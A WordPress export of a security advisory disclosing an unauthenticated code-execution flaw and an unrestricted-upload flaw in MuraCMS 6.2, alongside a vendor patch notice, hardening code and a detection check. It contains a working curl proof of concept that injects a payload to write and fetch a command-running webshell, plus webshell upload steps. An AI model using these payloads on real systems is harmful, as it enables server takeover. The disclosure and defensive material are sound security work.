{"id":6854,"date":"2017-03-03T14:19:22","date_gmt":"2017-03-03T22:19:22","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/03\/03\/news-645\/"},"modified":"2017-03-03T14:19:22","modified_gmt":"2017-03-03T22:19:22","slug":"news-645","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/03\/03\/news-645\/","title":{"rendered":"SSD Advisory \u2013 MuraCMS Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz | Date: Fri, 03 Mar 2017 16:04:16 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes two (2) vulnerabilities found in MuraCMS version 6.2. MuraCMS is an open source content management system for CFML, created by Blue River Interactive Group. Mura is designed to be used by marketing departments, web designers and developers.<\/p>\n<p>The vulnerabilities found in MuraCMS are:<\/p>\n<ol>\n<li>Unauthenticated remote arbitrary code execution<\/li>\n<li>Unrestricted file upload<\/li>\n<\/ol>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported these vulnerabilities to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Blue River has released a patch to address the vulnerabilities: &#8220;we put builds with the vulnerabilities patched and then released a blog as well as communicated via our Google group, Slack channel, twitter and mailing list.&#8221;<\/p>\n<p>The patch and blog post can be found <a href=\"http:\/\/www.getmura.com\/blog\/critical-security-update-for-mura-cms-all-versions-prior-to-7-0-6852\/\">here<\/a>.<\/p>\n<p><u><strong>Vulnerabilities details<\/strong><\/u><\/p>\n<p><strong>Unauthenticated remote arbitrary code execution<\/strong><br \/> The vulnerable function that leads to remote arbitrary code execution is &#8220;<em>evaluate<\/em>&#8221;, and the call can be 
found in <em>admin\/Application.cfm<\/em>.<\/p>\n<p>The function &#8220;<em>evaluate<\/em>&#8221; dynamically evaluates the string it is given as a CFML expression. Here it is used to read the value of an HTTP parameter whose name is built from the variable \u201c<em>#theParam#<\/em>\u201d, which is obtained by splitting another HTTP parameter, named \u201c<em>param<\/em>\u201d, as a comma-separated list.<\/p>\n<p>An attacker can therefore inject arbitrary CFML through this parameter. With a value such as \u201c1+eq+true+or+&lt;a function&gt;\u201d, the evaluate call ends up evaluating the string \u201crequest.context.paramField1 eq true or &lt;a function&gt;\u201d, and the injected function runs.<\/p>\n<p>However, because the parameter is first split as a list (\u201c<em>listLen<\/em>\u201d and \u201c<em>listGetAt<\/em>\u201d split on commas), only functions with zero or one argument can be injected directly: a call with two or more arguments is cut at the comma, each fragment is evaluated on its own, and the request fails with an error.<\/p>\n<p>To bypass this restriction, an attacker passes a nested <em>evaluate<\/em> call whose argument is a different HTTP parameter. The injected value becomes \u201c1+eq+true+or+evaluate(#request.context.payload#)\u201d, which contains no commas, and the real payload, commas included, is placed in the <em>payload<\/em> parameter.<\/p>\n<p><u>Vulnerable code: File:\/admin\/Application.cfm Line:428<\/u><br \/> This code runs on every request to the admin path, even when the user is not logged in. 
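<\/p>\n<p>The two points above, the comma limit on a direct injection and the nested <em>evaluate<\/em> bypass, modelled in Python as an added example. This is not Mura code: <em>request.context<\/em> is a plain dict, the list helpers mimic CFML list semantics, the function names are mine, and the POST body is constructed after the shape of the proof of concept. The same file carries a hardened replacement for the lookup and a detection check over a request body.<\/p>

```python
# Added example (not Mura CMS code): models the expression strings that the
# loop at admin/Application.cfm line 428 hands to evaluate(), the comma limit
# a direct injection runs into, a hardened replacement for the lookup, and a
# detection check over a POST body. request.context is a plain dict here.
from urllib.parse import parse_qs

# Constructed POST body shaped like the proof of concept: the whole injected
# expression sits in param, the real payload (commas and all) in payload.
SAMPLE_ATTACK_BODY = (
    'param=1+eq+true+or+evaluate(%23request.context.payload%23)'
    '&paramField1=false'
    '&payload=FileWrite(../shell.cfm,whoami)'
)
# Constructed body of a legitimate admin request: param is a numeric list.
SAMPLE_BENIGN_BODY = 'param=1,2&paramField1=title&paramCriteria1=x'


def cf_list_to_array(value, delim=','):
    # CFML list semantics as used by listLen()/listGetAt(): split on the
    # delimiter and skip empty elements.
    return [item for item in value.split(delim) if item != '']


def vulnerable_expressions(param):
    # The strings the vulnerable loop builds and passes to evaluate(), one per
    # list element of the param HTTP parameter. A comma inside an injected
    # function call therefore splits that call into two broken fragments.
    return ['request.context.paramField' + the_param
            for the_param in cf_list_to_array(param)]


def is_numeric_list(param):
    # The check that was missing: param must be a non-empty comma list of
    # integers, since it only ever indexes paramField1, paramField2, ...
    items = cf_list_to_array(param)
    return len(items) > 0 and all(item.isdigit() for item in items)


def hardened_lookup(context, param):
    # Hardened form: validate first, then read the request scope with a plain
    # key lookup. No string is evaluated, so there is nothing to inject into.
    if not is_numeric_list(param):
        raise ValueError('param must be a comma-separated list of integers')
    return [context.get('paramField' + the_param, '')
            for the_param in cf_list_to_array(param)]


def flag_request_body(body):
    # Detection over a URL-encoded POST body: report a param value that is
    # not a numeric list, and any payload parameter. payload is the name the
    # proof of concept uses; an attacker can pick another, so the shape of
    # param is the reliable signal and payload is only corroboration.
    fields = parse_qs(body, keep_blank_values=True)
    findings = []
    for value in fields.get('param', []):
        if not is_numeric_list(value):
            findings.append('param=' + value)
    for value in fields.get('payload', []):
        findings.append('payload=' + value)
    return findings


if __name__ == '__main__':
    for sample in ('1,2', 'FileWrite(a,b)',
                   '1 eq true or evaluate(#request.context.payload#)'):
        print(sample, '->', vulnerable_expressions(sample))
    print(flag_request_body(SAMPLE_ATTACK_BODY))
    print(flag_request_body(SAMPLE_BENIGN_BODY))
```

<p>The hardened lookup validates <em>param<\/em> as a list of integers and indexes the request scope directly, which takes <em>evaluate<\/em> out of the data path altogether. The detection function is the check a WAF rule or a log-replay script would apply to POST bodies sent to <em>\/admin\/<\/em>; it keys on the shape of <em>param<\/em> rather than on the parameter name <em>payload<\/em>, because the attacker chooses that name.<\/p>\n<p>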
The session check that guards the admin area does not stop execution when the user is not logged in; it only changes the \u201c<em>location<\/em>\u201d the user is sent to, so the code below still runs for unauthenticated requests.<\/p>\n<div id=\"crayon-58b9ebe9cb5f6013274340\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; 
font-size: 12px !important; line-height: 15px !important;\">if(request.context.param neq ''){\n    session.paramArray=arrayNew(1);\n    session.paramCircuit=listLast(listFirst(request.context.muraAction,'.'),':');\n    for(i=1;i lte listLen(request.context.param);i=i+1){\n        theParam=listGetAt(request.context.param,i);\n        if(evaluate('request.context.paramField#theParam#') neq 'Select Field'\n            and evaluate('request.context.paramField#theParam#') neq ''\n            and evaluate('request.context.paramCriteria#theParam#') neq ''){<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/div>\n<p><strong>Proof of Concept<\/strong><\/p>\n<div id=\"crayon-58b9ebe9cb5ff973659367\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">#!\/bin\/bash\nhost=\"127.0.0.1\"\npath=\"\/\"\nurl=\"${path}admin\/\"\nuseragent=\"Mozilla\/5.0 (X11; Linux x86_64; rv:42.0) Gecko\/20100101 Firefox\/42.0\"\n\n# CFML to be written into a file in the web root (one level above \/admin\/)\nshell=\"&lt;cfexecute name = 'whoami' arguments = '' timeout=2&gt;&lt;\/cfexecute&gt;\"\n# Filename of the written file\nshellname=\"shell.cfm\"\n# Path of the shell. It must not be under \/admin\/, because that path asks for a login.\nshellpath=\"..\/\"\n# Payload handed to the nested evaluate(): in this case it writes a file\npayload=\"FileWrite(\\\"${shellpath}${shellname}\\\", \\\"${shell}\\\")\"\n\n# Run requests: the first one injects, the second fetches the written shell.\ncurl -i -s -k -X \"POST\" -H \"User-Agent: ${useragent}\" \\\n  -H 'Content-Type: application\/x-www-form-urlencoded' \\\n  -b '' \\\n  --data-binary \"param=1+eq+true+or+evaluate(#request.context.payload#)&amp;paramField1=false&amp;payload=${payload}\" \\\n  \"http:\/\/${host}${url}\"\nresp=$(curl -i -s -k -H \"User-Agent: ${useragent}\" \"http:\/\/${host}${path}${shellname}\")\necho \"$resp\"<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/div>\n<p><strong>Unrestricted file upload<\/strong><br \/> MuraCMS allows its end users to upload as well as download files on the server. MuraCMS does not check the type of an uploaded file before moving it to a web-accessible uploads directory, and the original extension survives the rename. 
Every user logged in the web application with editing permissions, could upload a malicious webshell. <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<ol>\n<li>Login with test editor user and go to the site manager page<\/li>\n<li>Click on \u201cedit\u201d button in <em>&#8220;Home&#8221;<\/em>  <\/li>\n<li>In the \u201c<em>Assign Associated Image<\/em>\u201d section click on browse and upload the malicious <em>webshell.cfm<\/em> from your pc<\/li>\n<li>Click on publish button<\/li>\n<li>In order to know where the file is located it enough to fire up a web intercepting tool like Burp or Tamper data and click on download file.<\/li>\n<li>If you will use the Burp for example. you can able to see a request like following:<\/li>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58b9ebe9cb602794712843\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button 
crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/index.cfm\/_api\/render\/file\/?fileid=ABD5B173-790C-4973-  991504D56A3DF2B5&amp;method=attachment&amp;size=source HTTP\/1.1    Host: 192.168.0.101:8888  User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko\/20100101 Firefox\/42.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  Accept-Encoding: gzip, deflate  Page 6 of 7  Referer: http:\/\/192.168.0.101:8888\/admin\/?muraAction=cArch.edit&amp;contenthistid=E854D858-A5EF-46FAA8F5F7B343C93958&amp;siteid=default&amp;contentid=00000000000000000000000000000000001&amp;topid=00000000000000000000000000000000001&amp;type=Page&amp;parentid=00000000000000000000000000000000END&amp;moduleid=00000000000000000000000000000000000  Cookie: cfid=f4d255c5-4789-420c-8a41-a925671b1ae0; cftoken=0;  ORIGINALURLTOKEN=A589BA35-0260-4163-BF03CCC534A9AFC7; MOBILEFORMAT=false;  JSESSIONID=D06BAFB1A7DFCE934D82C6B804CD7AEE; CKFinder_Path=default_Site_Files%3A%2Fcache%2Ffile%2F%3A1;  FETDISPLAY=; REMEMBER=0; SUBSCRIBE=0; NAME=; URL=; EMAIL=  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px 
!important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-15\">15<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">index<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cfm<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">_api<\/span><span class=\"crayon-o\">\/<\/span><span 
class=\"crayon-v\">render<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">fileid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">ABD5B173<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">790C<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">4973<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-2\"><span class=\"crayon-cn\">991504D56A3DF2B5<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">method<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">attachment<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">source <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-4\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.0.101<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">8888<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-5\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">Macintosh<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-e\">Intel <\/span><span class=\"crayon-e\">Mac <\/span><span class=\"crayon-i\">OS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">X<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10.10<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">42.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">42.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-7\"><span class=\"crayon-v\">Accept<\/span><span 
class=\"crayon-o\">-<\/span>Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-8\">Accept-Encoding: gzip, deflate<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-10\">Referer: http:\/\/192.168.0.101:8888\/admin\/?muraAction=cArch.edit&amp;contenthistid=E854D858-A5EF-46FAA8F5F7B343C93958&amp;siteid=default&amp;contentid=00000000000000000000000000000000001&amp;topid=00000000000000000000000000000000001&amp;type=Page&amp;parentid=00000000000000000000000000000000END&amp;moduleid=00000000000000000000000000000000000<\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-11\">Cookie: cfid=f4d255c5-4789-420c-8a41-a925671b1ae0; cftoken=0;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-12\">ORIGINALURLTOKEN=A589BA35-0260-4163-BF03CCC534A9AFC7; MOBILEFORMAT=false;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-13\">JSESSIONID=D06BAFB1A7DFCE934D82C6B804CD7AEE; CKFinder_Path=default_Site_Files%3A%2Fcache%2Ffile%2F%3A1;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-14\">FETDISPLAY=; REMEMBER=0; SUBSCRIBE=0; NAME=; URL=; EMAIL=<\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-15\">Connection: keep-<span
class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<li>The string highlighted in red in the response above is the new name the web application gave our uploaded webshell.<\/li>\n<li>Now it is possible to point the browser at <em>http:\/\/&lt;url&gt;\/default\/cache\/file\/ABD5B173-790C-4973-991504D56A3DF2B5.cfm<\/em><\/li>\n<\/ol><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2955\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Fri, 03 Mar 2017 16:04:16 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in MuraCMS version 6.2. MuraCMS is an open source content management system for CFML, created by Blue River Interactive Group. Mura has been designed to be used by marketing departments, web designers and developers. The vulnerabilities found in MuraCMS are: Unauthenticated remote arbitrary code execution &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2955\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 MuraCMS Multiple Vulnerabilities<\/span> <span
class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6854","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6854","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6854"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6854\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6854"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6854"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6854"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}